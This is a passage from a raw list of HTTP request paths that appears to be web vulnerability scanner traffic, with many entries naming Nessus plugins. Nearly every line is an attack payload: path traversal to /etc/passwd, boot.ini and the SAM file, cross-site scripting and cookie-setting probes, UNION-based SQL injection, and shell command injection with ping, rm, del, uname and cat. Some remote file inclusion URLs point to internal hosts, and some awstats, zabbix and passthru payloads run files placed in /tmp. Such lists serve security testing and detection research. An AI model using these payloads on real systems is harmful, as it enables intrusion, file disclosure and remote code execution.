content=\"testchuc=2100\">\n/mpcgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/examples/jsp/sessions/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/examples/jsp/sessions/index.php?post=../config/password\n/cgi-local/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/cgi-bin/multihtml.pl?multi=/etc/passwd\\x00html\n/help.php?q=\"|ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/examples/jsp/num/detail.asp?nchannel='1\n/copatranscript_20061120/\n/cgi.cgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../vtigerservice.php\\x00\n/scripts/index.php?do=ext&page=http://xxxxxxxx/file\n/iktok2bw.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/sawmillcl.exe?ho+{complete_version}\n/papal_rescript/\n/javascript/pending.exe\n/it_script/\n/m5103snj.aspx?<script>cross_site_scripting.nasl</script>\n/cgi-914/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/phpmyadmin/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/cacti/index.php?cat='\n/en-us/n9xlumt5.php?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testnago=4518;\"</script>\n/javascript/sys.exe\n/9kr0ih0v.htm?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/zuihld5m.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/ns.exe\n/examples/jsp/colors/index.php?post=../config/password\n/examples/servlets/servlet/install.php?newlang=../../cpg_error.log\\x00\n/7uz3ok60.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/.passwd.sfish\n/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/nyvbv05h.htm?<script>document.cookie=\"testftxz=5980;\"</script>\n/scripts/callboth.php?seq=654321&out=123456&in=1331923202@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/zuihld5m.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/pbserver/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/5o9zq43e.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/anonymous.exe\n/search.pl?form=../../../../../../etc/passwd\\x00\n/top.php?stuff=&rm;q99662165&rem;\n/b4vng02k.htm?<script>document.cookie=\"testtrlh=3672;\"</script>\n/javascript/mssql.exe\n/webdav/c99.php?act=f&f=xampp-win32-1.7.2.exe&ft=download&d=c:\\users\\administrator\\desktop\n/javascript/tt.exe\n/en-us/odzk29aa.jsp?<script>document.cookie=\"testtfvh=2141;\"</script>\n/cgi-perl/windmail.exe\n/javascript/12.exe\n/main.php?logout=\"&ping -w 8000 -n 1 1.2.3.4&rem \n/javascript/.htpasswd.sfish/-2147483648\n/7uz3ok60.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/store.php?crn=42'&action=show&show_products_mode=cat_click\n/scripts/index.php?op=default&date=200607' union select 1,1043097911,1,1,1,1,1,1,1,1--&blogid=1\n/6n7aacgg.pl?<script>cross_site_scripting.nasl</script>\n/javascript/files.exe\n/main.php?logout=;del q18667266 #\n/cgi-bin/index.php?id='union/**/select/**/0,0,941052546,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cacti/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/help.php?q=\"\\x0duname >q44862556 #\n////..\\..\\..\\boot.ini\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/help.php?q=\"&del\\x0cq73531956&rem\\x0c\n/examples/jsp/colors/lang/index.php?file=/etc/passwd\n/p_description/\n/quagynka.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-local/c32web.exe/changeadminpassword\n/jujgxwav.cfc?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/javascript/article.exe\n/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/javascript/1991.exe\n/q703m78q.htm?<script>document.cookie=\"testvowq=604;\"</script>\n/<script>document.cookie=\"testftxz=5980;\"</script>\n/examples/jsp/error/check_user_id.php?user_id=<script>foo</script>\n/main.php?stuff='\\x0asleep\\x097\\x09#\n/cgi-bin/index.php?id=k7u62jp49d'\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cgi/texis.exe/junk\n/examples/jsp/checkbox/lang/lang.php?lang_path=/etc/passwd\\x00\n/examples/jsp/cal/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/gallery.scr.php?globals[pth][func]=@rfiurl?globals[pth][func]=@rfiurl?\n/javascript/htpasswd.inc\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/examples/jsp/error/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/scriptz/\n/en-us/account/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/n9xlumt5.exe?<script>cross_site_scripting.nasl</script>\n/main.php?logout=ver\\x0c>q61251932&rem\\x0c\n/j4drbkil.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.js\n/topic.php?tid='select\n/help.php?q=\\x0auname >q83373433 #\n/0qhcnefz.cfc?<script>cross_site_scripting.nasl</script>\n/byrg33fw.exe?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/cacti/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n<script>document.cookie=\"testftxz=5980;\"</script>\n/examples/jsp/jsp2/el/kb.cgi?view='&lang=en\n/help.php?q=\"rm\\x09q26563628\\x09#\n/examples/jsp/jsp2/el/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/subscriptionlogon/\n/mpcgi/query?mss=../config\n/javascript/.passwd.so\n/help.php?q=\"ver\\xa0>q93611953&rem\\xa0\n/cgi-bin/wa.exe?debug-show-version\n/t7tm4m0b.cgi?<script>cross_site_scripting.nasl</script>\n/ny1b3qq4.pl?<script>cross_site_scripting.nasl</script>\n/en-us/jnv890lt.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m5103snj.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping,-w,10000,-n,1,4.3.2.1&rem,\n/web_store/web_store.cgi?page=../../../../../../../../../../etc/passwd\\x00.html\n/help.php?q=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/secure/register.php?next=\"><script>alert(414605599126)</script><\"\n/examples/jsp/jsp2/el/install.php?newlang=../../cpg_error.log\\x00\n/javascript/spool.exe\n/nyjgaorz.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/server.exe\n/index.php?id=s1_eihg6e1'\n/e9rx3ya4.php?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/embed/day.php?path=/etc/passwd\\x00\n/javascript/agenda.exe\n/en-us/account/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/help.php?q=';uname >q16954753 #\n/main.php?logout=ver >q37787214&rem \n/examples/jsp/num/man-cgi?section=0&topic=ls;id\n/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/2aibfaczmac8??&cmd=ls\n/recordings/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"|ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/javascript/api.exe\n/xlj7h65o.jspa?<script>document.cookie=\"testtbbe=856;\"</script>\n/examples/jsp/cal/sources/functions.php?root_path=/etc/passwd\\x00\n/uc3w3bdi.htm?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/shoutbox.php?conf=../\n/main.php?logout=&ver;>q53872587&rem;\n//..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xafwindows/win.ini\n/vwmg565s.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/admin/top.php?admindir=/etc/passwd\\x00\n/javascript/.htpasswd.sfish/sfish>'>\"><sfish></sfish>\n/examples/jsp/colors/shopper.cgi?newpage=../../../../../../etc/passwd\n/help.php?q=\"&ping -w 7000 -n 1 1.2.3.4&rem \n/cgi-914/windmail.exe\n/scripts/calendar.php?month=' union select 1,1,'1331922013','calendarix_month_sql_injection.nasl',1 #\n/en-us/s7qus4g3.kspx?<script>cross_site_scripting.nasl</script>\n/en-us/dda2qr7j.cfc?<script>cross_site_scripting.nasl</script>\n/news.php?config[script_path]=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/cal/htmlscript?../../../../../../../../../etc/passwd\n/scripts/postinfo.asp\n/program_description/\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/zz5thkvtmlgl?\n/oie504mr.exe?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/x7pclv4s.php?<script>document.cookie=\"testiulz=3709;\"</script>\n/cacti/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+40+30+00+00+34+30+00+00+00+00+00+00+00+00+00+00+00+00+00++>>ctdn\n<script>document.cookie=\"testquyx=2820;\"</script>\n/7o5qp766.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ion-p.exe?page=c:\\winnt\\repair\\sam\n/examples/jsp/jsp2/el/calendar.php?serverpath=/etc/passwd\\x00\n/examples/jsp/colors/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/no4ghqiguzhst?\n/scriptedfeed/\n/modules/jinzora/popup.php?include_path=/etc/passwd\\x00\n/cgi-sys/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/<meta http-equiv=set-cookie content=\"testiklc=904\">\n/scripts/t769qwej0llr.php3\n/cgi-bin/articles/default.asp?ichannel=duportal_sql_injections2.nasl'&nchannel=articles\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/symxvqrirx0+>+/dev/null+&').\"]=1\n/q703m78q.exe?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/d765w06j.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0arm\\x09q64118446\\x09#\n/0qhcnefz.mscgi?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/qkzpkuflrb.sh;echo|awstats366697.txt\n/top.php?stuff=\"&rm\\x0cq43992942&rem\\x0c\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908881','5'--\n/javascript/bb.exe\n/javascript/adobe.exe\n/examples/jsp/jsp2/jspx/top.php?header=../../../../../../../../etc/passwd\n/0u75ldxq.kspx?<script>cross_site_scripting.nasl</script>\n/modif_infos.asp?n=/....../boot.ini\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q12725766&frm_user=&scr_height=&scr_width=\n/examples/servlets/servlet/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/fnwhrxyd.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/articles.exe\n/javascript/webdav.exe\n/examples/jsp/checkbox/index.php?act=arcade&do=stats&gameid=1'\n/odzk29aa.exe?<script>document.cookie=\"testtfvh=2141;\"</script>\n/phpmyadmin/index.php?id='union/**/select/**/0,0,999630768,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cgi-bin/fileseek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=\n/javascript/.passwd.vbs\n/shellscripting/\n/en-us/account/admin/admin.php?sid=0'\n/awstats/awstats.pl?migrate=|echo;/./tmp/jbqahurnly.sh;echo|awstats560126.txt\n/scripts/xtextarea.scr.php?globals[pth][spaw]=@rfiurl?globals[pth][spaw]=@rfiurl?\n/recordings/index.php?id='\n/cacti/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/subscriptioncheck/\n/0z575z74.kspx?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/en-us/account/catalog.php?action=category_show&id='\n/j4oqyvga.pl?<script>cross_site_scripting.nasl</script>\n/help.php?q=\";sleep\\x0911\\x09#\n/gy23xnjq.php?<script>cross_site_scripting.nasl</script>\n/scripts/rx9ysf2iwv4j.inc\n/zuihld5m.idc?<script>cross_site_scripting.nasl</script>\n/scripts/supporter/tupdate.php?groupid=change&sg='\n/gy23xnjq.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ybz5rz7a.exe?<script>document.cookie=\"testsbvw=6289;\"</script>\n/cgi-bin/windmail.exe? -n c:\\boot.ini\n/examples/jsp/cal/add_url.htm?node=<script>alert('xss')</script>\n/print.php?what=article&id='\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332009306\n/examples/jsp/cal/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/cgi-perl/sensepost.exe?/c+dir\n/azcrfs8d.html?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/jsp/sessions/index.php?p='nessus\n/examples/jsp/security/protected/is_cgi_installed3_.j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61893221447.swp\n/p043snfr.exe?<script>cross_site_scripting.nasl</script>\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331923195')</script>\n/phpmyadmin/index.php?op=default&date=200607' union select 1,237660662,1,1,1,1,1,1,1,1--&blogid=1\n/top.php?stuff=del;q44566983&rem;\n/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/scripts/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/ldlchhikup0;echo|awstats369722.txt\n/scripts/qcvjnagy16kc.inc\n/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/iajtej82.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-home/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- \n/ywaxntrx.mscgi?<script>cross_site_scripting.nasl</script>\n/manager/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/p043snfr.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/index.php?id='union/**/select/**/0,0,559725146,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/o35zot2r.asp?<script>cross_site_scripting.nasl</script>\n/a0imiuf1.x?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/scripts/1hactwocbsuo.inc\n/examples/servlets/servlet/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/scripts/view-source?view-source\n/cgibin/ppdscgi.exe\n/nuh3zirz.html?<script>cross_site_scripting.nasl</script>\n/m2fpztty.do?<script>cross_site_scripting.nasl</script>\n/javascript/kernel.exe\n/top.php?stuff=del;q42465427&rem;\n/examples/jsp/jsp2/el/direct.php?rf=/etc/passwd\\x00\n/edv3mapy.pl?<script>cross_site_scripting.nasl</script>\n/catinfo?<u><b>testing\n/examples/jsp/cal/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/manager/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cgi-915/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/e9rx3ya4.fts?<script>cross_site_scripting.nasl</script>\n/scripts/test-cgi?*\n/en-us/9kr0ih0v.jspa?<script>document.cookie=\"testzgnm=1183;\"</script>\n/javascript/ezshopper.exe\n/nmw0do67.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/statistics.exe\n/main.php?logout='\\x0arm\\x09q29624474\\x09#\n/edv3mapy.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/store.php?crn=42'&action=show&show_products_mode=cat_click\n/examples/jsp/cal/webdist.cgi?distloc=;id\n/examples/jsp/jsp2/el/zpanel.php?page=/etc/passwd\\x00\n/e9rx3ya4.aspx?<script>cross_site_scripting.nasl</script>\n/faq.php?action=&type=view&s=&id=-1' union select 0,1658544285,0,0,0,0,0--\n/cgi-home/testcgi.exe\n/jenna jameson's 1st porn video/\n/9kr0ih0v.html?<script>document.cookie=\"testzgnm=1183;\"</script>\n/main.php?stuff=\"\\x0ddel\\x09q53275598\\x09#\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/aqongcl.jsp\\x00\n/main.php?stuff=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/javascript/vfs.exe\n/vicodin-prescription/\n/ap58k3ci.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.passwd.meta\n/6qbynt4f.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=;del\\x09q84834127\\x09#\n/examples/jsp/jsp2/el/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n//a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q64992159%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/main.php?stuff=\"ver\\x09>q23164795&rem\\x09\n/examples/jsp/num/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/nyjgaorz.idc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/search.pl?realm=all&match=0&terms=test&nocpp=1&maxhits=10&;rank=<script>alert('vulnerable')</script>\n/33y9gcqq.dll?<script>document.cookie=\"testnvxc=4301;\"</script>\n/scripts/yabb.pl\n/mpcgi/cgi-test.exe\n/zln2hm2z.html?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/pbserver/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/num/core/api.php?t_path_core=/etc/passwd\\x00\n/subscription-service/\n/cacti/index.php?search=<script>foo</script>\n/dslpwt15.jspa?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/main.php?logout=ping;-w;7000;-n;1;1.2.3.4|rem;\n/javascript/tour.exe\n/e9rx3ya4.jspa?<script>cross_site_scripting.nasl</script>\n/bl8sefdm.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ows-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/u8yiqilu.do?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/j2kdmfw4.php?<script>cross_site_scripting.nasl</script>\n/vjbrrppi.cgi?<script>cross_site_scripting.nasl</script>\n/yef5f3d5.cfc?<script>document.cookie=\"testcrcv=6167;\"</script>\n/scripts/tomcat_proxy_directory_traversal.nasl1332008335\n/javascript/.htaccess/''''\"\"\"\"\n/confirmunsubscription.php?output=http://192.168.202.96:8080/swgnhpydbq0t?\n/6qbynt4f.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/bin/html2text.php\n/cgis/msmmask.exe?mask=/junk334\n/psynch/nph-psf.exe?css=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/<script>document.cookie=\"testyrbs=2855;\"</script>\n/scripts/index.php?op=default&date=200607' union select 1,1563821747,1,1,1,1,1,1,1,1--&blogid=1\n/?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/main.php?logout=ver\\x09>q71472498&rem\\x09\n/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>\n/xsqln7eb.htm?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/examples/jsp/jsp2/el/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_2tgmms8c]));die;/*\n/sgdynamo.exe?htname=<script>alert('vulnerable')</script>\n/javascript/cv.exe\n/main.php?logout=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/javascript/htpasswd.stackdump\n/help.php?q='del\\x09q19574333\\x09#\n/j4rdyhw8.pl?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/fo564rei.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?templates_dir=/etc/passwd\\x00\n/en-us/i686v90l.html?<script>document.cookie=\"testfutf=1550;\"</script>\n/top.php?stuff=\"ping,-w,7000,-n,1,1.2.3.4|rem,\n/if69ddo1.dll?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/bxnyrhmh.pl?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/help.php?q=\";uname\\x09>q77596328\\x09#\n/ht8pn8uq.do?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='del q29765145 #\n/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/top.php?stuff=\"del\\x09q66382972&rem\\x09\n/o35zot2r.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/main.php?stuff=\"del\\x0bq36113668&rem\\x0b\n/l13b77e5.php?<script>document.cookie=\"testjvvf=7721;\"</script>\n/0w155a7c.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testvowq=604;\"</script>\n/javascript/out.exe\n/en-us/fo564rei.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/wiki.php/<script>foo</script>\n/scripts/gdxlwjnlsr6i.php\n/t7tm4m0b.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testexuu=5340;\"</script>\n/cgi-local/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/\"flying imams\"/\n/main.php?logout=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/x7pclv4s.exe?<script>document.cookie=\"testiulz=3709;\"</script>\n/<script>document.cookie=\"testdnbh=5237;\"</script>\n/xanax-prescription/\n/quagynka.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ggvfa_wichxq.php3\n/o1zj4u9v.fts?<script>document.cookie=\"testabrn=6368;\"</script>\n/<script>alert('vulnerable')</script>\n/examples/servlets/servlet/index.php?module=<script>foo</script>\n/0rufe52p.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/fo564rei.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/ddoworrl.idc?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/main.php?stuff=\"&ver&rem\\x09\n/bzuf9ozq.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/index.php?id='\n/?<script>document.cookie=\"testsixi=8451;\"</script>\n/recordings/core/api.php?t_path_core=/etc/passwd\\x00\n/6dlc2zm9.x?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/main.php?logout='\\x0duname #\n/phpmyadmin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/javascript/3g.exe\n/javascript/csproj.exe\n/zmvq66jy.asp?<script>cross_site_scripting.nasl</script>\n/scripts/rih28haesl0j.html\n/help.php?q=\"&ver;>q51857139&rem;\n/top.php?stuff=\"ping -w 9000 -n 1 4.3.2.1&rem \n/ao22ww7y.exe?<script>document.cookie=\"testqppc=8767;\"</script>\n/o'bryon/\n/javascript/certificate.exe\n/en-us/account/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/t769qwej0llr.cgi\n/counterpunch_subscriptions/\n/examples/jsp/sessions/cvslog.cgi?file=<script>window.alert</script>\n/ghswfouu.jspa?<script>document.cookie=\"testsqmm=5713;\"</script>\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/examples/servlets/servlet/htsearch?exclude=`/etc/passwd`\n/help.php?q=\"&rm\\x0cq57632929&rem\\x0c\n/fo564rei.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/newsscript.pl?mode=admin\n/5qnlm5z2.dll?<script>document.cookie=\"testsixi=8451;\"</script>\n/main.php?logout=;uname >q18667266 #\n/examples/jsp/jsp2/jspx/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/e9rx3ya4.pl?<script>cross_site_scripting.nasl</script>\n/cgibin/.passwd\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/vir0v3xfc?\n/examples/jsp/jsp2/jspx/index.php?site=../../../../../../../../etc/passwd\\x00\n/dda2qr7j.x?<script>cross_site_scripting.nasl</script>\n/jdx255ea.dll?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/help.php?q=\"ver >q26428197&rem \n/rbec2ohx.dll?<script>cross_site_scripting.nasl</script>\n/cgi-bin/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/examples/jsp/cal/top.php?header=../../../../../../../../etc/passwd\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/vir0v3xfc?\n/ywaxntrx.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sys/code/box.inc.php?config[\"sipssys\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n//<body><script/src=\"http://www.example.com/test?rnd=q96795255\"></script>\n/ows-bin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/en-us/jnv890lt.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/cart32.exe\n/cgi-local/htimage.exe/path/filename?2,2\n/ju0u7kfo.do?<script>cross_site_scripting.nasl</script>\n/modif_infos.asp?n=../../../../../../../../../etc/passwd\\x00\n/rpc/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?stuff=\"del q63222197&rem \n/main.php?logout=\"sleep\\x099\\x09#\n/examples/jsp/error/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/vacation_subscription/\n/cacti/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/scs86g1p.dll?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/edv3mapy.idc?<script>cross_site_scripting.nasl</script>\n/product-description/\n/8t9v8k7x.php3?<script>document.cookie=\"testhvje=9403;\"</script>\n/t7tm4m0b.html?<script>cross_site_scripting.nasl</script>\n/main.php?logout='&del\\x09q65543975\\x09#\n/help.php?q=';rm\\x09q61196872\\x09#\n/en-us/account/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/help.php?q=&ver\\x0c>q32366888&rem\\x0c\n/g8nu2yy7.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/tukodz3j.exe?<script>cross_site_scripting.nasl</script>\n/console/faces/com_sun_web_ui/help/helpwindow.jsp?windowtitle=</title><script>alert('sun_java_web_console_helpwindow_xss.nasl')</script>\n/examples/jsp/checkbox/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/examples/servlets/servlet/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/cacti/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/examples/jsp/sessions/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/main.php?stuff=1417058040' and 1=1 and ''<>'q1w0j8kz\n/examples/jsp/colors/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/smilscript/\n/d7ktpmcq.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testwews=8477;\"</script>\n/main.php?stuff=&ping;-w;11000;-n;1;1.2.3.4&rem;\n/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/main.php?logout=\"sleep 10 #\n/hipkz026.html?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/cgi-bin/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/main.php?stuff='\\x0drm q67566355 